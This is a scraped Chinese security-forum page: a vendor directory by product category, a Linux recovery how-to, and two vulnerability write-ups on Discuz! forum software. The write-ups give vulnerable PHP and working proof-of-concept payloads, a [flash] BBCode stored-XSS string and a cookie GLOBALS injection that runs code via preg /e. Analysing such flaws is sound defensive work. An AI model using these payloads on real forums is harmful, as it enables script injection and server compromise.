  • 负载均衡:深信服、北京中科四方、东华软件、信安世纪、灵州网络、北京华夏创新、北京楷然昊天、上海云速、湖南麒麟、杭州迪普、启明星辰、南京易安联、上海纽盾、Panabit、北京擎企、H3C、弘积科技、北京远为软件、福建伊时代
  • 应用交付:智恒科技、深信服、信安世纪、瑞友天翼、360、天融信、东软、任子行、优炫、中科曙光、弘积科技
  • 加密机/密码机:江南科友、网御星云、天融信、三未信安、山东得安、卫士通、山东渔翁、无锡江南、江南天安、江南博仁、兴唐通信、中安网脉、君众甲匠、立思辰、江南信安、山东确信、信安世纪
  • DNS安全:电信云堤、厦门帝恩思、知道创宇
  • 不良信息识别与监测:金惠科技
主机安全
  • 桌面管理/主机审计:北信源、汉邦、联软、蓝盾、互普&溢信(IP-Guard)、启明星辰、网御星云、360、天融信、金盾软件、广州国迈、软云神州、哈尔滨朗威、上海创多、深圳金天眼、杭州正杰、浙江远望电子、北京盖特佳、峰盛科技、中软、卫士通、沈阳通软、圣博润、上讯信息、交大捷普、中孚信息、上海浩迈、金山、海峡信息、博智软件、江民科技、江南信安、山丽信息、亚东软件、706所、中电瑞铠
  • 单机防病毒:瑞星、江民科技、金山、360、百度、腾讯、东方微点、费尔、火绒、亚信安全、安天、博智软件
  • 网络防病毒:瑞星、360、金山、江民科技、东方微点、北信源、亚信安全、安天、博智软件
  • 主机文档加密与权限控制/HDLP:亿赛通、天锐绿盾、时代亿信、明朝万达、蓝盾、互普&溢信(IP-Guard)、北信源、金盾软件、启明星辰、北京盖特佳、峰盛科技、中软、卫士通、上海祥殷、上海前沿、杭州华途、江苏敏捷、思智泰克、交大捷普、中孚信息、福州深空、天融信、思睿嘉得、合力思腾、深圳虹安、上讯信息、成都力合智远、莱克斯、365数据安全/四川西图、山东申启、金山、天空卫士、锐思特、赛猊腾龙、海峡信息、深信达、博智软件、江民科技、天喻软件、上海谐桐、亚东软件、武汉百易时代
  • 源代码加密及嵌入式开发源码加密:深信达、明朝万达、亿赛通、IP-Guard、山丽信息、天锐绿盾、互普&溢信(IP-Guard)、中软、虹安
  • 主机安全加固:浪潮、椒图、安全狗、广州国迈、中软华泰、上海观安、可信华泰、中嘉华诚、中航嘉信、易路平安、亚信安全、安天、优炫、安普诺、中超伟业、中科曙光、神荼科技、青藤云安全、安恒信息
  • 终端登录/身份认证:上海格尔、吉大正元、卫士通、信安世纪、上讯信息、南京易安联、北信源、九州云腾、中孚信息、博智软件、哈尔滨朗威
  • 移动存储介质管理:北信源、北京天桥、启明星辰、金盾软件、广州国迈、哈尔滨朗威、上海创多、亿赛通、交大捷普、上海浩迈、上海格尔、安天、金山、天喻软件、山丽信息、亚东软件
  • 补丁管理:北信源、360、启明星辰、金盾软件、上海创多、交大捷普、亚信安全、金山
  • 打印安全/打印管理/打印审计:北京恒安讯佳、北信源、中孚信息、安普锐、天锐绿盾、金山、保旺达、哈尔滨朗威、天喻软件、瑞达信息、山丽信息、武汉百易时代、鼎盾科技、思为同飞
应用安全
  • 网页防篡改:安恒信息、智恒科技、赛蓝、山东中创、绿盟科技、启明星辰、上海天存、上海天泰、福州深空、北京通元、国舜股份、蓝盾、安全狗、WebRay远江、杭州迪普、上讯信息、交大捷普、青松云安全、海峡信息、江民科技、立思辰、六壬网安
  • Web应用防火墙·WAF·硬件:安恒信息、启明星辰、绿盟科技、天融信、铱迅信息、知道创宇、上海天泰、杭州迪普、山东中创、WebRay远江、蓝盾、北京千来信安、中新网安、软云神州、中软华泰、上讯信息、上海天存、利谱、交大捷普、任子行、中铁信睿安、上海纽盾、360、卫达安全、金电网安、安赛创想、东软、海峡信息、安信华、博智软件、山石网科、江民科技、立思辰、六壬网安、安码科技、神荼科技
  • Web应用防火墙·WAF·软件:福州深空、安恒信息、铱迅信息、安全狗、云锁、青松云安全、上海天存、安码科技
  • Web应用防火墙·服务&云WAF:安恒信息、阿里云、腾讯云、360、知道创宇、上海有云、湖盟、百度安全/安全宝、蓝盾、北京千来信安、中软华泰、上讯信息、快云、斗象科技/网藤风险感知、网宿科技、上海云盾、青松云安全、电信云堤、UCloud、数梦工场
  • WEB漏洞扫描:安恒信息、四叶草安全、国舜股份、绿盟科技、知道创宇、WebRay远江、安赛创想、安犬漏洞扫描云平台、启明星辰、经纬信安、上海观安、斗象科技/漏洞盒子/网藤风险感知、恒安嘉新、安识科技、H3C、六壬网安、安码科技
  • 网站安全监测产品:安恒信息、绿盟科技、知道创宇、360、WebRay远江、任子行、四叶草安全、安全狗、恒安嘉新、安信华、H3C、江民科技、安普诺、立思辰、浙江乾冠
  • 网站安全监测服务:安恒信息、绿盟科技、知道创宇、360、百度安全/安全宝、WebRay远江、北京千来信安、任子行、安全狗、恒安嘉新、四叶草安全、浙江乾冠
  • 邮件安全产品:守内安、网际思安、蓝盾、敏讯、冠群金辰、盈世CoreMail、时代亿信、上海格尔、安宁、凌久、国瑞信安、蓝海星、北京方向标、上海青羽/靠谱邮件、亚信安全、安宁、安普诺、武汉百易时代
  • 数据库漏洞扫描:安恒信息、安信通、安华金和、建恒信安、中安星云、杭州闪捷
  • 数据库防火墙:安恒信息、安华金和、中安比特/中安威士、帕拉迪/汉领信息、杭州美创、中安星云、杭州闪捷
  • 数据库加密和脱敏:中安比特/中安威士、安华金和、迈科龙、中安星云、杭州美创、上海观安、优炫、广州鼎甲、杭州闪捷
  • 数据库审计:安恒信息、安华金和、思福迪、启明星辰、网御星云、天融信、极地银河、山东中创、蓝盾、北信源、莱克斯、软云神州、绿盟科技、上讯信息、中安比特/中安威士、交大捷普、金盾软件、昂楷科技、帕拉迪/汉领信息、上海纽盾、东软、杭州美创、优炫、海峡信息、安信华、博智软件、中安星云、东华软件、六壬网安、思为同飞、706所、杭州闪捷
  • 半自动&自动化渗透平台:安恒信息、安络科技、四叶草安全
  • 应用统一身份管理/身份认证/单点登录/认证网关/PKI/CA/数字证书/令牌/各种KEY:天诚安信、派拉软件、神州融信、上海格尔、天威诚信、信安世纪、东软、吉大正元、安识科技、北京安讯奔、九州云腾、中科曙光、洋葱安全、极验验证、立思辰、江南信安、山东确信 | 各省都有CA,这个就单列了、中科恒伦、上海林果、福建伊时代
  • 代码防火墙:上海观安
  • 加密安全设备/NDLP:福建伊时代、时代亿信、365数据安全、天空卫士、思为同飞
  • 反钓鱼/反欺诈:电信云堤、国舜股份、知道创宇、百度、阿里、腾讯、360、安天、亚信安全、安恒信息、江民科技、华青融天
  • 语音安全:北京无限互联
数据安全
  • 数据备份:上海爱数、杭州美创、火星高科&亚细亚智业、苏州美天网络、信核数据、上讯信息、英方股份、上海联鼎、亿备&广州鼎鼎、和力记易、广州鼎甲、安码科技、南京壹进制、浪擎科技、福建伊时代
  • 虚拟机备份与恢复:成都云祺、英方股份、和力记易、广州鼎甲、北京远为软件
  • 数据清除工具:中孚信息、北京天桥、上海浩迈、万里红、中超伟业、博智软件、方德信安、哈尔滨朗威
移动安全/虚拟化安全/云安全
  • 虚拟化安全防护:安恒信息、启明星辰、广州国迈、北信源、中软、南京易安联、山石网科、阿姆瑞特、上海观安、东软、安全狗、云锁、亚信安全、金山、蓝盾、北京远为软件
  • 手机防病毒:腾讯、瑞星、金山、360、网秦、百度、中软、安天、恒安嘉新、亚信安全、蓝盾
  • 移动终端管理/EMM/MDM:国信灵通/启迪国信、北信源、360、明朝万达、中软、安天、上讯信息、北京珊瑚灵御、亚信安全、金山、蓝盾、江民科技、江南信安
  • CASB/云业务安全接入代理:炼石网络、云安宝、信云科技、绿盟科技、启明星辰
  • 手机APP安全:梆梆安全、北京智游网安/爱加密、阿里聚安全、360、任子行、北京鼎源科技、腾讯御安全、恒安嘉新、安普诺、安码科技
  • 基于云的安全服务:青松云安全、青藤云安全、百度云、腾讯云、阿里云、360、华为、安全宝、山石网科、万般上品、东软、卫达安全、白帽汇、海峡信息、四叶草安全、中国电信·安全帮 | 此条目待调整、待完善!
  • 大数据安全:安恒信息、启明星辰、绿盟科技、360、派拉软件、观数科技、瀚思、天行网安、上海观安、聚铭网络、中孚信息、恒安嘉新、志翔科技、知道创宇、科来公司、安码科技、杭州美创 | 这是一个比较纠结的分类,因为牵扯到的内容太多……现在主流的安全厂家几乎都能做一部分,但是……这个分类可能近期会做细化
安全管理
  • SIEM/日志管理/日志审计/SOC/安管平台:安恒信息、思福迪、360、天融信、启明星辰、东软、蓝盾、蚁巡、江南天安、北信源、上讯信息、赛克蓝德、神州泰岳、交大捷普、派拉软件、瀚思、中铁信睿安、聚铭网络、华清信安、上海纽盾、亚信安全、优炫、安信华、H3C、华青融天、安码科技、北京中安智达、706所、福建伊时代
  • 运维审计/4A/堡垒机:安恒信息、思福迪、帕拉迪/汉领信息、浙江齐治、尚思科技、江南科友、绿盟科技、天融信、启明星辰、建恒信安、蓝盾、华为、泰然神州、上海艺赛旗、北京极地、信安世纪、圣博润、江南天安、国迈、上讯信息、神州泰岳、亿阳信通、麒麟、云安宝、交大捷普、德讯科技、任子行、派拉软件、上海观安、金盾软件、智恒科技、东软、金电网安、亚信安全、北京安讯奔、盛世光明、优炫、海峡信息、保旺达、安信华、中科曙光、六壬网安
  • 网管软件/ITIL:广通信达、网强、汉远网智、北塔、蚁巡、华为、锐捷、摩卡[华胜天成]、国聿、上讯信息、交大捷普、飞思安诺/飞思网巡、恒安嘉新、优炫、艾科网信、海峡信息、迈科网络、东华软件
  • 漏洞扫描与管理:安恒信息、榕基、启明星辰、绿盟科技、铱迅信息、极地银河、蓝盾、WebRay远江、江南天安、杭州迪普、天融信、交大捷普、安犬漏洞扫描云平台、经纬信安、上海观安、中铁信睿安、斗象科技/漏洞盒子/网藤风险感知、宿州东辉、四叶草安全、恒安嘉新、安天、蓝盾、君众甲匠、博智软件、中科网威、立思辰、六壬网安、安普诺
  • 网络和主机配置核查系统:安恒信息、思福迪、绿盟科技、启明星辰、聚铭网络、北京随方信息、博智软件
  • 主机安全保密检查工具:中孚信息、北信源、北京天桥、哈尔滨朗威、万里红、华安保、上海浩迈、博智软件、方德信安
  • 信息安全等级保护测评工具箱:安恒信息、国瑞信安、圣博润、公安一所、锐安 | 注:市面上多家厂家均生产此产品,但公安部仅指定了5家作为“合格的”生产单位!
  • 网络安全态势感知:安恒信息、知道创宇、360、绿盟科技、WebRay远江盛邦、四叶草安全、任子行、上海观安、兰云科技、聚铭网络、恒安嘉新、白帽汇、杭州合众、亚信安全、安天、郑州赛欧思、江民科技、科来公司、安码科技
  • 应急处置工具箱:安恒信息
工控安全产品与厂商大全威努特、匡恩网络、谷神星、海天炜业、珠海鸿瑞、力控华康、启明星辰、绿盟科技、中科网威、三零卫士、安恒信息、北京网藤科技、天地和兴、安恒信息……
  • 工控防火墙:中科网威、威努特、匡恩网络、谷神星、海天炜业、力控华康、天地和兴、安点科技、网藤科技、卫达安全、博智软件、九略智能
  • 工控安全审计:威努特、天地和兴、匡恩网络、网藤科技、斗象科技/漏洞盒子/网藤风险感知、安点科技、博智软件、安恒信息、知道创宇、中科网威
  • 工控漏洞扫描/挖掘:天地和兴、匡恩网络、网藤科技、斗象科技/漏洞盒子/网藤风险感知、博智软件、知道创宇
  • 工控安管平台:天地和兴、匡恩网络、中科网威
  • 工控主机安全防护:天地和兴、网藤科技、安点科技、九略智能
  • 工控入侵检测/威胁感知/入侵防御:安点科技、天地和兴、网藤科技、博智软件、科来公司、中科网威
  • 工控网闸:安点科技、中科网威
  • 工控防泄密:匡恩网络
  • 工控检查工具箱:安恒信息、
  • 工控蜜罐:匡恩网络、
  • 工控攻防实验室:匡恩网络、网藤科技、博智软件
  • 工控态势感知:安恒信息、博智软件、360、知道创宇、浙江乾冠、九略智能
中国自主可控网络安全产品与厂商
  • 数据来源于申威产业联盟、龙芯产业联盟、中关村可信计算产业联盟自主可信专委会;
  • 就自主可控行业的特殊性而言,很多大厂商是作为特供产品进行市场宣传,而小厂商只作为品牌规划,并没有特殊宣传,在数据收集时可能会导致内容不全面;
  • 对于名单中未涉及的厂商,可以单独联系, 告知欲添加的分类、公司名称(需在上述3个联盟中);
  • 感谢中关村可信联盟自主可信专委会相关工作人员整理!
  • 防火墙:中科神威、天融信、网御星云、东软、中科曙光、蓝盾、中航鸿电、中船综合院、706所
  • 入侵检测/防御:中科神威、网神、中科曙光、安恒信息 、绿盟科技、汉柏
  • 漏洞扫描系统:中科神威、安恒信息 、绿盟科技
  • 安全管理平台:启明星辰、中科神威、360
  • 网闸/安全隔离与信息单向导入设备:国保金泰、中科神威、北京安盟、赛博兴安
  • 加密机:江南天安
  • 终端安全:北信源、江民科技
  • Web应用防火墙:上海天泰
  • 堡垒机:建恒信安、江南寰宇
  • 负载均衡:般固科技
  • 防毒墙:江民科技
  • 备份一体机:壹进制
  • 网络流量分析:北京卓迅
  • 网络准入控制:画方科技
  • 存储:创新科、同有飞骥
未分类子类
  • 舆情监控:中国舆情网、优捷信达、乐思、红麦、中科点击、泰一舆情、探宝、拓尔思、本果、软云神州、西盈、任子行、网藤风险感知、南京快页数码、博智软件、北京中安智达
  • 威胁情报:微步在线、上海观安、斗象科技/http://FreeBuf.com/漏洞盒子、恒安嘉新、白帽汇、天际友盟、知道创宇、360、安恒信息
  • 国产操作系统:Deepin深度、RedFlag红旗、Kylin麒麟、NeoKylin中标麒麟、StartOS起点/雨林木风OS、凝思磐石安全操作系统、共创Linux、思普Linux
  • 国产数据库:达梦数据库、东软OpenBASE、国信贝斯iBase、人大金仓KingBase、南大通用GBase
  • 业务风控安全:锦佰安、指掌易、邦盛、岂安、行邑、同盾、通付盾
  • 蜜罐:安恒信息、三零卫士、凌晨网络、绿盟科技、默安科技
  • 安全硬件平台/工控机:新汉、阿普奇、盛博、集智达、英德斯、福升威尔、华北科技、艾宝、华北工控、研祥、祈飞、研华,立华,惠尔,智威智能
  • 数据恢复:苏州美天网络、金山安全、易数科技、华客、飞客、众成、博智软件
  • 数据库准入:杭州美创
  • 数据库堡垒机:杭州美创
  • 红黑电源滤波插座:保旺达、启航智通
  • 电磁屏蔽柜:启航智通、信安邦
  • 数字取证:美亚柏科、盘石软件
  • 安全计算机:瑞达信息

Linux 下root家目录和/bin/下的执行程序更改出现问题解决

系统安全ttgo2 发表了文章 • 0 个评论 • 187 次浏览 • 2018-10-23 11:10 • 来自相关话题

 今天我们群里同学出现一个Linux操作后,系统无法正常使用的问题,具体问题的操作是这样的
 
1 、问题复现
step1:在root的用户下执行了如下两个命令:mv /bin/ls /root
mv /root /bin/lsstep2:接下来无法执行ls命令,显示如下:
[root@bogon Desktop]# ls
bash: ls: command not found
[root@bogon Desktop]#
step3:重启系统step4:分析一下,原因
mv /bin/ls  /root  这个命令,把ls命令移动到了root下
[root@bogon ~]# cd /root
[root@bogon ~]# pwd
/root
[root@bogon ~]# ./ls
anaconda-ks.cfg Documents install.log ls Pictures Templates
Desktop Downloads install.log.syslog Music Public Videos
[root@bogon ~]#

mv /root /bin/ls  把/root/的文件移动到了 /bin/ls/命令下,这时候root改名为ls,如下:
[root@bogon ls]# pwd
/bin/ls
[root@bogon ls]# ./ls
anaconda-ks.cfg Documents install.log ls Pictures Templates
Desktop Downloads install.log.syslog Music Public Videos
[root@bogon ls]#
2 、问题分析
两个问题需要考虑:
重启之后root是否可以正常登陆?普通账号是否收到影响?
root登陆正常,ls无法使用,因为ls命令的路径发生了变化,正常
bash-4.1# ls
bash: ls: command not found
bash-4.1#
普通账号也正常登陆
[yanw@localhost Desktop]$ ls
bash: ls: command not found
[yanw@localhost Desktop]$ 3 问题解决
step1:把/bin/ls/ls 文件拷贝到/root(不是没有root目录了吗?重启系统后root登陆,会根据/etc/passwd 文件里面的root的家目录在创建一个,不受影响)
step2:拷贝ls到家目录
bash-4.1# cp /bin/ls/ls ./
bash-4.1#
bash-4.1#
bash-4.1#
bash-4.1# ./ls
Desktop Documents Downloads ls Music Pictures Public Templates Videos
bash-4.1#
step3:rm删除/bin/ls  复制ls到/bin下即可,全局使用正常
bash-4.1# rm -rf /bin/ls
bash-4.1#
bash-4.1#
bash-4.1# cp ls /bin/
bash-4.1# ls
Desktop Documents Downloads ls Music Pictures Public Templates Videos
bash-4.1#




step4:修改一下提示符 ,修改全局变量PS1的值
 
PS1='[\u@\h \w]\$ ' 
 ----注意$后面有一个空格!如果没有空格的话,将会报错!

   \d :代表日期,格式为weekday month date,例如:"Mon Aug 1" 

\H :完整的主机名称。例如:我的机器名称为:fc4.linux,则这个名称就是fc4.linux 

\h :仅取主机的第一个名字,如上例,则为fc4,.linux则被省略 

\t :显示时间为24小时格式,如:HH:MM:SS 

\T :显示时间为12小时格式 

\A :显示时间为24小时格式:HH:MM 

\u :当前用户的账号名称 

\v :BASH的版本信息 

\w :完整的工作目录名称。家目录会以 ~代替 

\W :利用basename取得工作目录名称,所以只会列出最后一个目录 

\# :下达的第几个命令 

\$ :提示字符,如果是root时,提示符为:# ,普通用户则为:$
 
step5:为了长期生效我们修改一下 /etc/profile文件,在最后一行添加上    PS1='[\u@\h \w]\$ ' 文件解决
bash-4.1# source /etc/profile
[root@localhost ~]#
[root@localhost ~]#
[root@localhost ~]#

  查看全部
 今天我们群里同学出现一个Linux操作后,系统无法正常使用的问题,具体问题的操作是这样的
 
1 、问题复现
step1:在root的用户下执行了如下两个命令:
mv /bin/ls  /root
mv /root /bin/ls
step2:接下来无法执行ls命令,显示如下:
[root@bogon Desktop]# ls
bash: ls: command not found
[root@bogon Desktop]#

step3:重启系统step4:分析一下,原因
mv /bin/ls  /root  这个命令,把ls命令移动到了root下
[root@bogon ~]# cd /root
[root@bogon ~]# pwd
/root
[root@bogon ~]# ./ls
anaconda-ks.cfg Documents install.log ls Pictures Templates
Desktop Downloads install.log.syslog Music Public Videos
[root@bogon ~]#

mv /root /bin/ls  把/root/的文件移动到了 /bin/ls/命令下,这时候root改名为ls,如下:
[root@bogon ls]# pwd
/bin/ls
[root@bogon ls]# ./ls
anaconda-ks.cfg Documents install.log ls Pictures Templates
Desktop Downloads install.log.syslog Music Public Videos
[root@bogon ls]#
2 、问题分析
两个问题需要考虑:
  • 重启之后root是否可以正常登陆?
  • 普通账号是否收到影响?

root登陆正常,ls无法使用,因为ls命令的路径发生了变化,正常
bash-4.1# ls
bash: ls: command not found
bash-4.1#
普通账号也正常登陆
[yanw@localhost Desktop]$ ls
bash: ls: command not found
[yanw@localhost Desktop]$
3 问题解决
step1:把/bin/ls/ls 文件拷贝到/root(不是没有root目录了吗?重启系统后root登陆,会根据/etc/passwd 文件里面的root的家目录在创建一个,不受影响)
step2:拷贝ls到家目录
bash-4.1# cp /bin/ls/ls ./
bash-4.1#
bash-4.1#
bash-4.1#
bash-4.1# ./ls
Desktop Documents Downloads ls Music Pictures Public Templates Videos
bash-4.1#
step3:rm删除/bin/ls  复制ls到/bin下即可,全局使用正常
bash-4.1# rm -rf /bin/ls
bash-4.1#
bash-4.1#
bash-4.1# cp ls /bin/
bash-4.1# ls
Desktop Documents Downloads ls Music Pictures Public Templates Videos
bash-4.1#




step4:修改一下提示符 ,修改全局变量PS1的值
 
PS1='[\u@\h \w]\$ ' 
 ----注意$后面有一个空格!如果没有空格的话,将会报错!

   \d :代表日期,格式为weekday month date,例如:"Mon Aug 1" 

\H :完整的主机名称。例如:我的机器名称为:fc4.linux,则这个名称就是fc4.linux 

\h :仅取主机的第一个名字,如上例,则为fc4,.linux则被省略 

\t :显示时间为24小时格式,如:HH:MM:SS 

\T :显示时间为12小时格式 

\A :显示时间为24小时格式:HH:MM 

\u :当前用户的账号名称 

\v :BASH的版本信息 

\w :完整的工作目录名称。家目录会以 ~代替 

\W :利用basename取得工作目录名称,所以只会列出最后一个目录 

\# :下达的第几个命令 

\$ :提示字符,如果是root时,提示符为:# ,普通用户则为:$
 
step5:为了长期生效我们修改一下 /etc/profile文件,在最后一行添加上    PS1='[\u@\h \w]\$ ' 文件解决
bash-4.1# source /etc/profile
[root@localhost ~]#
[root@localhost ~]#
[root@localhost ~]#

 

什么是CRLF

回复

PHPttgo2 发起了问题 • 1 人关注 • 0 个回复 • 220 次浏览 • 2018-10-21 09:31 • 来自相关话题

Discuz! 帖子正文存在存储型xss漏洞

渗透测试zksmile 发表了文章 • 0 个评论 • 194 次浏览 • 2018-10-19 11:24 • 来自相关话题

0x01漏洞范围
 discuz 7.x 成功
discuz!X 3.1 成功
discuz!X 3.2 失败
具体的范围需要实际测试
 
0x02漏洞详情
 需要开启多媒体代码功能(这个目前很多大站开启了)
source\function\function_discuzcode.phpif(strpos($msglower, '[/flash]') !== FALSE) {
$message = preg_replace("/\[flash(=(\d+),(\d+))?\]\s*([^\[\<\r\n]+?)\s*\[\/flash\]/ies”, $allowmediacode ? "parseflash('\\2', '\\3', '\\4');" : "bbcodeurl('\\4', '<a href=\"{url}\" target=\"_blank\">{url}</a>')", $message);}跟踪parseflash函数:function parseflash($w, $h, $url) {
$w = !$w ? 550 : $w;
$h = !$h ? 400 : $h;
preg_match("/((https?){1}:\/\/|www\.)[^\[\"'\?]+(\.swf|\.flv)(\?.+)?/i", $url, $matches);
$url = $matches[0];
$randomid = 'swf_'.random(3);
if(fileext($url) != 'flv') {
return '<span id="'.$randomid.'"></span><script type="text/javascript" reload="1">$(\''.$randomid.'\').innerHTML=AC_FL_RunContent(\'width\', \''.$w.'\', \'height\', \''.$h.'\', \'allowNetworking\', \'internal\', \'allowScriptAccess\', \'never\', \'src\', encodeURI(\''.$url.'\'), \'quality\', \'high\', \'bgcolor\', \'#ffffff\', \'wmode\', \'transparent\', \'allowfullscreen\', \'true\');</script>';
} else {
return '<span id="'.$randomid.'"></span><script type="text/javascript" reload="1">$(\''.$randomid.'\').innerHTML=AC_FL_RunContent(\'width\', \''.$w.'\', \'height\', \''.$h.'\', \'allowNetworking\', \'internal\', \'allowScriptAccess\', \'never\', \'src\', \''.STATICURL.'image/common/flvplayer.swf\', \'flashvars\', \'file='.rawurlencode($url).'\', \'quality\', \'high\', \'wmode\', \'transparent\', \'allowfullscreen\', \'true\');</script>';
}
}可以看出preg_match("/((https?){1}:\/\/|www\.)[^\[\"'\?]+(\.swf|\.flv)(\?.+)?/i", $url, $matches);正则处理不当(\?.+)
从而可以带进“'”到 encodeURI(\''.$url.'\'),从而造成存储型xss
到 encodeURI(\''.$url.'\'),从而造成存储型xss。
 
0x03 漏洞证明:
 找一篇帖子回复:[flash]http://localhost/flash.swf?'+alert('zksmile')+'[/flash]7.x 截图如下:





 
x 3.1截图如下:





  查看全部
0x01漏洞范围
 
discuz 7.x 成功
discuz!X 3.1 成功
discuz!X 3.2 失败
具体的范围需要实际测试

 
0x02漏洞详情
 需要开启多媒体代码功能(这个目前很多大站开启了)
source\function\function_discuzcode.php
if(strpos($msglower, '[/flash]') !== FALSE) {
$message = preg_replace("/\[flash(=(\d+),(\d+))?\]\s*([^\[\<\r\n]+?)\s*\[\/flash\]/ies”, $allowmediacode ? "parseflash('\\2', '\\3', '\\4');" : "bbcodeurl('\\4', '<a href=\"{url}\" target=\"_blank\">{url}</a>')", $message);}
跟踪parseflash函数:
function parseflash($w, $h, $url) {
$w = !$w ? 550 : $w;
$h = !$h ? 400 : $h;
preg_match("/((https?){1}:\/\/|www\.)[^\[\"'\?]+(\.swf|\.flv)(\?.+)?/i", $url, $matches);
$url = $matches[0];
$randomid = 'swf_'.random(3);
if(fileext($url) != 'flv') {
return '<span id="'.$randomid.'"></span><script type="text/javascript" reload="1">$(\''.$randomid.'\').innerHTML=AC_FL_RunContent(\'width\', \''.$w.'\', \'height\', \''.$h.'\', \'allowNetworking\', \'internal\', \'allowScriptAccess\', \'never\', \'src\', encodeURI(\''.$url.'\'), \'quality\', \'high\', \'bgcolor\', \'#ffffff\', \'wmode\', \'transparent\', \'allowfullscreen\', \'true\');</script>';
} else {
return '<span id="'.$randomid.'"></span><script type="text/javascript" reload="1">$(\''.$randomid.'\').innerHTML=AC_FL_RunContent(\'width\', \''.$w.'\', \'height\', \''.$h.'\', \'allowNetworking\', \'internal\', \'allowScriptAccess\', \'never\', \'src\', \''.STATICURL.'image/common/flvplayer.swf\', \'flashvars\', \'file='.rawurlencode($url).'\', \'quality\', \'high\', \'wmode\', \'transparent\', \'allowfullscreen\', \'true\');</script>';
}
}
可以看出
preg_match("/((https?){1}:\/\/|www\.)[^\[\"'\?]+(\.swf|\.flv)(\?.+)?/i", $url, $matches);
正则处理不当
(\?.+)

从而可以带进“'”到 encodeURI(\''.$url.'\'),从而造成存储型xss
到 encodeURI(\''.$url.'\'),从而造成存储型xss。
 
0x03 漏洞证明:
 找一篇帖子回复:
[flash]http://localhost/flash.swf?'+alert('zksmile')+'[/flash]
7.x 截图如下:

1.png

 
x 3.1截图如下:

2.png

 

Discuz! 6.x/7.x 全局变量防御绕过导致命令执行

渗透测试zksmile 发表了文章 • 0 个评论 • 201 次浏览 • 2018-10-18 16:15 • 来自相关话题

0x01 漏洞概述

由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致Discuz! 6.x/7.x 全局变量防御绕过漏洞。
 
0x02 漏洞分析
 
include/global.func.php代码里:function daddslashes($string, $force = 0) {
!defined('MAGIC_QUOTES_GPC') && define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
if(!MAGIC_QUOTES_GPC || $force) {
if(is_array($string)) {
foreach($string as $key => $val) {
$string[$key] = daddslashes($val, $force);
}
} else {
$string = addslashes($string);
}
}
return $string;
}
 
include/common.inc.php里:foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
foreach($$_request as $_key => $_value) {
$_key{0} != '_' && $$_key = daddslashes($_value);
}
}
 
在GPC为off时会调用addslashes()函数处理变量值,但是如果直接使用$_GET/$_POST/$_COOKIE这样的变量,这个就不起作用了,然而dz的源码里直接使用$_GET/$_POST/$_COOKIE的地方很少,存在漏洞的地方更加少。
不过还有其他的绕过方法,在register_globals=on下通过提交GLOBALS变量就可以绕过上面的代码了.为了防止这种情况,dz中有如下代码:if (isset($_REQUEST['GLOBALS']) OR isset($_FILES['GLOBALS'])) {
exit('Request tainting attempted.');
}
这样就没法提交GLOBALS变量了么?
$_REQUEST这个超全局变量的值受php.ini中request_order的影响,在最新的php5.3.x系列中,request_order默认值为GP,也就是说默认配置下$_REQUEST只包含$_GET和$_POST,而不包括$_COOKIE,那么我们就可以通过COOKIE来提交GLOBALS变量了
 
0x03漏洞复现
直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();




  查看全部
0x01 漏洞概述

由于php5.3.x版本里php.ini的设置里request_order默认值为GP,导致Discuz! 6.x/7.x 全局变量防御绕过漏洞。
 
0x02 漏洞分析
 
include/global.func.php代码里:
function daddslashes($string, $force = 0) {
!defined('MAGIC_QUOTES_GPC') && define('MAGIC_QUOTES_GPC', get_magic_quotes_gpc());
if(!MAGIC_QUOTES_GPC || $force) {
if(is_array($string)) {
foreach($string as $key => $val) {
$string[$key] = daddslashes($val, $force);
}
} else {
$string = addslashes($string);
}
}
return $string;
}

 
include/common.inc.php里:
foreach(array('_COOKIE', '_POST', '_GET') as $_request) {
foreach($$_request as $_key => $_value) {
$_key{0} != '_' && $$_key = daddslashes($_value);
}
}

 
在GPC为off时会调用addslashes()函数处理变量值,但是如果直接使用$_GET/$_POST/$_COOKIE这样的变量,这个就不起作用了,然而dz的源码里直接使用$_GET/$_POST/$_COOKIE的地方很少,存在漏洞的地方更加少。
不过还有其他的绕过方法,在register_globals=on下通过提交GLOBALS变量就可以绕过上面的代码了.为了防止这种情况,dz中有如下代码:
if (isset($_REQUEST['GLOBALS']) OR isset($_FILES['GLOBALS'])) {
exit('Request tainting attempted.');
}

这样就没法提交GLOBALS变量了么?
$_REQUEST这个超全局变量的值受php.ini中request_order的影响,在最新的php5.3.x系列中,request_order默认值为GP,也就是说默认配置下$_REQUEST只包含$_GET和$_POST,而不包括$_COOKIE,那么我们就可以通过COOKIE来提交GLOBALS变量了
 
0x03漏洞复现
直接找一个已存在的帖子,向其发送数据包,并在Cookie中增加
GLOBALS[_DCACHE][smilies][searcharray]=/.*/eui; GLOBALS[_DCACHE][smilies][replacearray]=phpinfo();

1.png